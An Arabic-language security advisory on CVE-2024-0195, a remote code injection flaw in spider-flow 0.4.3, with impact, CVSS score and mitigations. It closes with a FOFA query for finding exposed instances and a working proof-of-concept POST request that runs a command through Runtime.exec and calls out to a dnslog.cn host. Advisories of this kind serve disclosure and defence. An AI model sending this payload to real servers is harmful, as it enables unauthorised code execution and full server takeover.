
CVE-2024-0195 التحكم غير السليم في توليد الشيفرة ('حقن الشيفرة')
ثغرة CVE-2024-0195 هي ثغرة حرجة من نوع حقن الكود (Code Injection) في تطبيق الويب spider-flow الإصدار 0.4.3، وتحديدًا في الدالة FunctionService.saveFunction الموجودة في الملف FunctionController.java. يمكن للمهاجم إدخال كود خبيث عن بُعد يتم تنفيذه على الخادم. وهذا يسمح بالاختراق الكامل للتطبيق.
هذه الثغرة خطيرة للغاية لأنها تسمح بتنفيذ الكود عن بُعد على الخادم الذي يستضيف تطبيق spider-flow المعرض للخطر. يمكن للمهاجم اختراق الخادم بالكامل، وسرقة البيانات الحساسة، وتثبيت برامج ضارة أو برامج تعدين العملات الرقمية، واستخدامه في هجمات أخرى داخل الشبكة. تتأثر سرية وسلامة وتوفر التطبيق والخادم بشكل بالغ.
لم يتم ذكر إصدار مصحح بشكل صريح، لذا لا يبدو أن التصحيح خيار حاليًا. تم الكشف عن الثغرة علنًا وتتوفر أكواد الاستغلال، لذا فإن التخفيف الفوري أمر بالغ الأهمية.
حتى يتم إصدار تصحيح رسمي، يجب إخراج spider-flow 0.4.3 من الخدمة فورًا أو تقييد الوصول إلى الشبكات/المستخدمين الموثوقين فقط. يمكن تكوين جدران حماية تطبيقات الويب أو ضوابط التحقق من الإدخال الأخرى لاكتشاف ومنع محاولات هجمات حقن الكود كإجراء تخفيف مؤقت. ومع ذلك، هذه ليست حلولًا كاملة ويجب ترقية الإصدار المعرض للخطر بمجرد توفر إصدار مصحح.
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
FOFA : app="spiderflow"
✔ إثبات المفهوم
POST /function/save HTTP/1.1
Host: 192.168.116.128:8080
X-Requested-With: XMLHttpRequest
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 139
id=&name=test¶meter=test&script=return+java.lang.%2F****%2FRuntime%7D%3Br%3Dtest()%3Br.getRuntime().exec('ping+18k2tu.dnslog.cn')%3B%7B